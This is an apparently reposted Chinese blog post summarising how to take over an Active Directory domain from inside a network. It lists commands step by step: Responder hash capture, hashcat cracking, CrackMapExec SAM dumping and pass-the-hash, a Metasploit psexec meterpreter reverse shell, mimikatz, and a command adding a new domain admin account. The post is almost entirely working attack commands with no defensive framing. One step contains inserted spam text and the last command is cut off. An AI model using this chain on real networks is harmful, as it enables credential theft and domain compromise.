Responder探测内网获取域控权限总结


Responder探测内网获取域控权限总结(1)执行Responder探测内网(https://github.com/lgandx/Responder)./Responder.py -I eth0 -rPv(2)获取172.16.157.133的Responder值(3)使用Crack Map Exec检查此主机的NetBIOS信息cme smb 172.16.157.133(4)使用hashcat对Responder值进行破解hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule获取密码值Winter2018!(5)CME扫描cme smb 172.16.157.133 -u FRONTDESK -p ‘Winter2018!’ –local-auth(6)获取本地的管理员帐户对本地密码散列进行dumpcme smb 172.16.157.133 -u FRONTDESK -p ‘Winter2018!’ –local-auth –sam(7)获取FRONTDESK密码的NTLM哈希值FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::(8)哈希传递方式查看本地网络的smb权限情况cme smb 172.16.157.0/24 -u administrator -H ‘aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51’ –local-
auth(9)可以登录172.16.157.134服务器(10)对172.16.157.134进行查看,该计算免费云主机域名机具备域控权限cme smb 172.16.157.134(11)msf下面利用smb口令进行shell获取use exploit/windows/smb/psexecset smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51set smbuser administratorset playload windows/x64/meterpreter/reverse_tcprungetuid(12)使用mimikatz获取域控密码load mimikatzkerberoscme smb 172.16.157.135 -u administrator -p ‘October17’ -x ‘net user markitzeroda hackersPassword! /add /domain /y && net group “domain admins” markitzeroda

相关推荐: Nessus在centos上面的应用

好久没有更新博客了,今天我就来说一下如何在centos或者redhat上面添加nessus的应用。nessus是一款非常方便的安全扫描工具,这个工具的优点有很多。小巧并且功能比较强大,能够满足企业对于安全忙面的扫描了。好了,下面我们开始安装nessus百度百科…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/01 21:06
下一篇 02/01 21:06